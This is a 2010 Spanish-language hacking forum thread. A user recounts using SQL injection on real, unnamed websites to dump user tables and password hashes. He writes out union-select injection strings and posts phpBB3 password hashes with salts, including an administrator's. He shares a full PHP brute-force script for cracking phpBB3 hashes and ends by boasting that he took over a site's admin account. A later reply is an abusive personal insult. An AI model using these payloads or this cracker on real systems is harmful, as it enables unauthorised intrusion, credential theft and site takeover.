elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Guía actualizada para evitar que un ransomware ataque tu empresa


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking
| | |-+  Bugs y Exploits
| | | |-+  Nivel Web (Moderadores: sirdarckcat, WHK)
| | | | |-+  SQLi PhpBB3 y Hash :S Cosas que no entiendo.
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] 2 Ir Abajo Respuesta Imprimir
Autor Tema: SQLi PhpBB3 y Hash :S Cosas que no entiendo.  (Leído 6,817 veces)
xustyx

Desconectado Desconectado

Mensajes: 213


Ver Perfil
SQLi PhpBB3 y Hash :S Cosas que no entiendo.
« en: 12 Junio 2010, 22:45 pm »

Bueno desde hace unos dias me lei un post de SQLI por aqui y me dio curiosidad por probar.

El resultado ha sido bueno pero aun estoy confuso, vamos que entiendo lo justo.
Empeze por googlear y buscar vulnerabilidades y tal y acabe llegando a conseguir users y pass en MD5 que logre descifrar :)

Bueno aun asi tengo bastantes dudas de cosas curiosas que me an pasado.
-La primera es que en una web al poner  el "+limit+1,1--" puff error y bueno pese que seria que tendrian la opcion capeada o algo y al no poder usar limit segui buscando directamente y logre sacar user y pass.

-La segunda es que bueno voi haciendo la injeccion tal tal i encuentro la table (pondre ejemplos por que no recuerdo exactamente los names) lolusers
ok hasta hay todo correcto busco las columnas y encuentro user_pass y user_name Mi cara se vuelve asi  ;D i de repente cuando inyecto el "union select 1,user_pass,3,user_name,4,5 from lolusers" ERROR Asipt_table.lolusers don't exist entonces mi cara cambio a  :¬¬

-La tercera Weno ya trasteando mas me voi a una web que conozco y empiezo a investigar voi poniendo menos en todos los lados donde hay un = al final :D y nada :S al final me voi a un apartado de un apartado y mi sorpresa que al poner - me salta el error y yo siii!!!!!!! empiezo la inyeccion y consigo sacar users y pass(en MD5) bueno voi a logear error usuario incorrecto... COMO?¿? no puede ser entonces empeze a pensar que esa tabla no era de donde estaba logeando y decidi ir a la web donde me logeaba que era un foro sin posible inyeccion sigo investigando y nada empiezo a mirar exploits para la version del foro y despues de un largo fracaso de compilaziones y hasta los webos me da por irme a la pagina web i volver a buscar las tablas pero esta vez con "+limit" Bingo !!!!
una Tabla llamada phpbb_users :D weno sigo inyectando y encuentro lo que se supone que son sus columnas username y user_password y al poner -1+union+select+1,user_name,3,4,5,6+from+phpbb_users-- PUM error! Me di cuenta que si ponia otro from como por ejemplo el de la tabla que consegui anteriormente i quitando user_name por un 2 no me daba el error :S y dije sera que la tabla no existe por que da el error ?¿? el error siempre era el mismo error on line tal tal tal no me daba nada util entonces decidi usar el SQLi Helper y por asombro mio funciono me dio los users y las pass pero por asombro mio vi esto:
$H$9dBxaam9AtP0aPNgegO0DTeYerVN791:
:
$H$9.TQxNJcJdbQlCruOduDGj0WS8s.pa.:
$H$9UmNyRm/EGlqoZVXEw3eKXYMd6kuso1:
$H$9cVYQkENBW2ZJ6.tetK9IhB4Cd5BnN.:
$H$9cRsVQnMf2Snv/BJu6cVq2Ze67yjtb/:

y dije pff y esto que es y como desencryptar esto en todas las pass aparece el $H$
que debe de ser algun encabezado pero ni entiendo con que an encryptado eso.

Bueno esto es todo. Si alguien sabe el porque de mis dudas, como descifrar eso, y como hacer cosas bonitas en foros PHPBB3 que postee :) Si quereis mas informacion sobre sobre el host,otras cosas que os interesen y otras dudas que no entendais de como me he explicado y quereis que os lo aclare postear.

UN SALUDO A TODOS !!!!
En línea

xustyx

Desconectado Desconectado

Mensajes: 213


Ver Perfil
Re: SQLi PhpBB3 y Hash :S Cosas que no entiendo.
« Respuesta #1 en: 14 Junio 2010, 00:30 am »

Weno haber si alguien me echa una mano jijiji

De momento he estado investigando y buscando por hay por hay.
He encontrado algo pero aun no lo he probado y ahora probare que me tenio que instalar el php para ejecutar un Script haber si rula. Tambien he encontrado una columna muy curiosa llamada user_form_salt y parece que funciona al azahar:)
Bueno en definitiva que tengo esto.

User: Admin
Hash: $H$9tJpe2rPbpx2LBGc1gb/9BqVfrmDhS/
Salt: ca28b6b43c28f6b3

Weno voy a probar el script.
Echarme el ultimo empujoncito si algien sabre resolver lo que falta :D

Un saludo a todos :)
En línea

xustyx

Desconectado Desconectado

Mensajes: 213


Ver Perfil
Re: SQLi PhpBB3 y Hash :S Cosas que no entiendo.
« Respuesta #2 en: 14 Junio 2010, 00:33 am »

Ahh! os dejo el script por aqui si alguien lo necesita :)
Código
  1. /////////////////////////////////////////////////////////////////// R00TSECURITY.ORG - YOUR SECURITY COMMUNITY // - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -// [2008-07-15] PhpBB3 Hash Bruteforce// http://r00tsecurity.org/db/code/134// - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -// GENERATED ON: 2010-06-13 | 17:52:35/////////////////////////////////////////////////////////////////CODE INFOUSAGE:
  2. php script.php 'hash' charsSOURCE CODE#!/usr/bin/php
  3. <?php
  4.  
  5. echo "///////////////////////////////////////////////\r\n";
  6. echo "//         PHPBB3 Bruteforce             //\r\n";
  7. echo "//  Original bruteforce script by Tux      //\r\n";
  8. echo "//     Moded for Phpbb3 by Jeforce     //\r\n";
  9. echo "//     http://www.jeforce.net            //\r\n";
  10. echo "////////////////////////////////////////////\r\n";
  11.  
  12. if ($argc<2 || $argv[1]=='--help') {
  13.    echo<<<END
  14. USAGE: {$argv[0]} 'hash' chars
  15.     - hash        : The hash to crack
  16.     - chars        : Max length string to attempt to crack
  17.  
  18. HELP: {$argv[0]} --help
  19.  
  20.  
  21. END;
  22.    exit;
  23. }
  24. //Fonction PHPBB3
  25.  
  26. function _hash_crypt_private($password, $setting, &$itoa64)
  27. {
  28. $output = '*';
  29. // Check for correct hash
  30. if (substr($setting, 0, 3) != '$H$')
  31. {return $output;}
  32.  
  33. $count_log2 = strpos($itoa64, $setting[3]);
  34. if ($count_log2 < 7 || $count_log2 > 30)
  35. {return $output;}
  36. $count = 1 << $count_log2;
  37. $salt = substr($setting, 4, 8);
  38. if (strlen($salt) != 8)
  39. {return $output;}
  40.  
  41. $hash = pack('H*', md5($salt . $password));
  42. do
  43. {
  44. $hash = pack('H*', md5($hash . $password));
  45. }
  46. while (--$count);
  47. $output = substr($setting, 0, 12);
  48. $output .= _hash_encode64($hash, 16, $itoa64);
  49. return $output;
  50. }
  51. function _hash_gensalt_private($input, &$itoa64, $iteration_count_log2 = 6)
  52. {
  53. if ($iteration_count_log2 < 4 || $iteration_count_log2 > 31)
  54. {$iteration_count_log2 = 8;}
  55. $output = '$H$';
  56. $output .= $itoa64[min($iteration_count_log2 + ((PHP_VERSION >= 5) ? 5 : 3), 30)];
  57. $output .= _hash_encode64($input, 6, $itoa64);
  58. return $output;
  59. }
  60.  
  61. /**
  62. * Encode hash
  63. */
  64. function _hash_encode64($input, $count, &$itoa64)
  65. {
  66. $output = '';
  67. $i = 0;
  68. do
  69. {
  70. $value = ord($input[$i++]);
  71. $output .= $itoa64[$value & 0x3f];
  72. if ($i < $count)
  73. {$value |= ord($input[$i]) << 8;}
  74. $output .= $itoa64[($value >> 6) & 0x3f];
  75. if ($i++ >= $count)
  76. {break;}
  77. if ($i < $count)
  78. {$value |= ord($input[$i]) << 16;}
  79. $output .= $itoa64[($value >> 12) & 0x3f];
  80. if ($i++ >= $count)
  81. {break;}
  82. $output .= $itoa64[($value >> 18) & 0x3f];
  83. }
  84. while ($i < $count);
  85. return $output;
  86. }
  87. function phpbb_check_hash($password, $hash)
  88. {
  89. $itoa64 = './0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz';
  90. if (strlen($hash) == 34)
  91. {
  92. return (_hash_crypt_private($password, $hash, $itoa64) === $hash) ? true : false;
  93. }
  94. return (md5($password) === $hash) ? true : false;
  95. }
  96.  
  97. //if(isset($argv[4])) $charset=$argv[4];
  98. //else $charset = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789';
  99.  
  100. $charset = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789';
  101. $charset_beginning = $charset{0};
  102. $charset_end = $charset{strlen($charset)-1};
  103.  
  104. //$HASH = '$H$99i1.eNyzhGdi5/lAnKnSjU8iIABC80';
  105. // $SIZE = (int) $_GET['chars'];
  106. $HASH = $argv[1];
  107. $SIZE = (int) $argv[2];
  108.  
  109. $start = time()-1;
  110. $curtotal=0;
  111. $total=0;
  112. for($i=$SIZE; $i>0; $i--) $total+=pow(strlen($charset), $i);
  113. $split=ceil(($total/strlen($charset))/5);
  114.  
  115.  
  116. echo " *** MAX SIZE: $SIZE, cracking HASH: $HASH\r\n";
  117. echo " *** TOTAL KEYS: $total\r\n";
  118. echo " *** CHARSET: $charset\r\n";
  119.  
  120. for($i=1; $i<=$SIZE; $i++) {
  121.    $keyspace = pow(strlen($charset), $i);
  122.    echo "\r\nAttempting to crack with $i characters.\r\n";
  123.    echo " *** Total combinations: $keyspace\r\n";
  124.  
  125.    $key = '';
  126.    for ($y=0; $y<$i; $y++) $key .= $charset_beginning;
  127.  
  128.    for ($x=0; $x<$keyspace+1; $x++) {
  129.        $curtotal++;
  130.  
  131.        if (phpbb_check_hash($key, $HASH)) {
  132.            $time=(time()-$start);
  133.            echo<<<END
  134.  
  135. Successfully key cracked after $time seconds. The cracker searched a total
  136. of $curtotal keys out of a possible $total in $time seconds.
  137.  
  138. Found the clear text of '$HASH' is '$key'.\n
  139. END;
  140.            exit;
  141.        }
  142.  
  143.        if($x%$split == 0) {
  144.            $rate=ceil($curtotal/(time()-$start));
  145.            echo " ... $curtotal/$total ($key) [$rate Keys/second]\r\n";
  146.        }
  147.  
  148.        for ($y=0; $y<$i; $y++) {
  149.            if ($key[$y] != $charset_end) {
  150.                $key[$y] = $charset{strpos($charset, $key[$y])+1};
  151.  
  152.                if ($y > 0)  for ($z = 0; $z < $y; $z++) $key[$z] = $charset_beginning;
  153.                break;
  154.            }
  155.        }
  156.    }
  157. }
  158. $time=time()-$start;
  159. echo<<<END
  160. *** SORRY NO MATCHS FOUND
  161.     Time running : $time. Keys searched : $total.\n
  162. END;
  163. ?>// http://r00tsecurity.org/db/code/134
  164.  
Hasta luego!
En línea

Shell Root
Moderador Global
***
Desconectado Desconectado

Mensajes: 3.723


<3


Ver Perfil WWW
Re: SQLi PhpBB3 y Hash :S Cosas que no entiendo.
« Respuesta #3 en: 14 Junio 2010, 00:48 am »

-La segunda es que bueno voi haciendo la injeccion tal tal i encuentro la table (pondre ejemplos por que no recuerdo exactamente los names) lolusers
Ehh?, tuviste un poco de imaginación y poner users?

Asipt_table.lolusers don't exist [/b] entonces mi cara cambio a  :¬¬
jajajaja Pwned!
En línea

Por eso no duermo, por si tras mi ventana hay un cuervo. Cuelgo de hilos sueltos sabiendo que hay veneno en el aire.
xustyx

Desconectado Desconectado

Mensajes: 213


Ver Perfil
Re: SQLi PhpBB3 y Hash :S Cosas que no entiendo.
« Respuesta #4 en: 14 Junio 2010, 00:58 am »

Na si pongo cualquier table la que sea users o alguna otra siempre me da lo mismo.
Asipt_table."nombre de la tabla que pongo"
Es un prefix que ponen al hacer la consulta talvez aya algun modo de borrar el prefix y entonces si que funcione pero no se no se :S
En línea

xustyx

Desconectado Desconectado

Mensajes: 213


Ver Perfil
Re: SQLi PhpBB3 y Hash :S Cosas que no entiendo.
« Respuesta #5 en: 14 Junio 2010, 01:02 am »

Por cierto el Script Funciona :D
Pero vamos attempting to crack with 4 characters. Tal vez si tengo suerte i el admin a puesto una pass corta funcione :)
En línea

xustyx

Desconectado Desconectado

Mensajes: 213


Ver Perfil
Re: SQLi PhpBB3 y Hash :S Cosas que no entiendo.
« Respuesta #6 en: 14 Junio 2010, 01:31 am »

Bueno si todo esto no funciona... Alguien sabe algun modo de obtener Permisos Admin en un user normal?¿ Algo como crear un user y añadirle a la tabla de permisos el rango de admin. No se si mediante una inyeccion xploit o lo que sea sera posbile eso :S
En línea

xustyx

Desconectado Desconectado

Mensajes: 213


Ver Perfil
Re: SQLi PhpBB3 y Hash :S Cosas que no entiendo.
« Respuesta #7 en: 14 Junio 2010, 03:42 am »

Bueno sigo aportando mas cosas :)

HASH: $H$9YSi5FYkRx4aIMejyZo.9LCvuefQb31
SALT: 16eeb051d024903a
PASS: deface

entonces si....

HASH: $H$9tJpe2rPbpx2LBGc1gb/9BqVfrmDhS/
SALT: ca28b6b43c28f6b3
PASS: ???????????????????? Como la puedo sacar?¿?¿?
En línea

xustyx

Desconectado Desconectado

Mensajes: 213


Ver Perfil
Re: SQLi PhpBB3 y Hash :S Cosas que no entiendo.
« Respuesta #8 en: 14 Junio 2010, 18:47 pm »

BUENO PORFIN XUSTY 1 WEB 0 !!!!!!!!!!!!!!!!!!!!

Nada no consegui descifrar nada de eso lo que hice fue lo siguiente.

Como consegui los datos por un SQLi lo que hize al cabo de horas i horas fue mirar otras Data Bases y me di cuenta de algo en otras Data bases habian tambien phpbb_ y yo dije juer que raro bueno que me puse a trastear i sace unos cuantos users a los que probe en el foro i Lo sentimos pero debido al update del foro no emos podido convertir tu pass porfavor intreoduzela tal tal..
entonces dije esto tiene algo que ver y claro que lo tenia era el foro antiguo en phpbb2 jajajaj lo que hize fue cojer la tabla de users i Bingo por suerte estaban en md5.

Por asombro mio cuando desencrypte el MD5 me di cuenta de que el admin tenia muy poca creatividad y encima no se molestaron ni a cambiar el pass al cambiar el foro.

Un saludo a todos y espero que os sirva a alguno ya ves aveces la solucion esta buscando en otro sitio :))))
En línea

Zazú

Desconectado Desconectado

Mensajes: 116


Ver Perfil
Re: SQLi PhpBB3 y Hash :S Cosas que no entiendo.
« Respuesta #9 en: 5 Julio 2010, 05:52 am »

-La segunda es que bueno voi haciendo la injeccion tal tal i encuentro la table (pondre ejemplos por que no recuerdo exactamente los names) lolusers
Ehh?, tuviste un poco de imaginación y poner users?

Asipt_table.lolusers don't exist [/b] entonces mi cara cambio a  :¬¬
jajajaja Pwned!

WE ALEX TE JURO QEU SOS LA PERSONA MAS ENFERMITA DEL MUNDO, TE PONES A COMENTAR COMO UN  PELOTUDO PARA GANAR NIVEL EN UNA PAGINA, DEMOSTRAS QUE NO DEBES TENER NI SIQUIERA AMIGOS POR QUE TE PASAS 24 HORAS ON 7 DIAS A lA SEMANA.
QUE ***** TE IMPORTA A VOS SI SE LE OCURRIO ESE NOMBRE DE EJEMPLO? TENES 3 AÑOS PARECE
SI SOS TAN HACKER VOS POR QUÉ NO LE DECIS A QUE SE REFIERE EL ERROR, INUTIL

TE VEO GORDO, FRACASADO, SIN AMIGOS Y QUE TIENE UN EGO GIGANTE




HORRIBLE SOS
En línea

Páginas: [1] 2 Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Explicarme cosas que no entiendo de crack wifi
Hacking Wireless
davidvillano 1 2,646 Último mensaje 3 Octubre 2011, 23:00 pm
por Uxio
Explicarme cosas que no entiendo de crack wifi 2.0
Hacking Wireless
davidvillano 9 5,612 Último mensaje 30 Octubre 2011, 20:17 pm
por pepeluxx
¿como saber este hash? no lo entiendo
Criptografía
oco 2 3,447 Último mensaje 21 Octubre 2012, 17:08 pm
por oco
Cosas que no entiendo....
Sugerencias y dudas sobre el Foro
XeDeR 4 4,976 Último mensaje 6 Junio 2017, 17:49 pm
por el-brujo
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines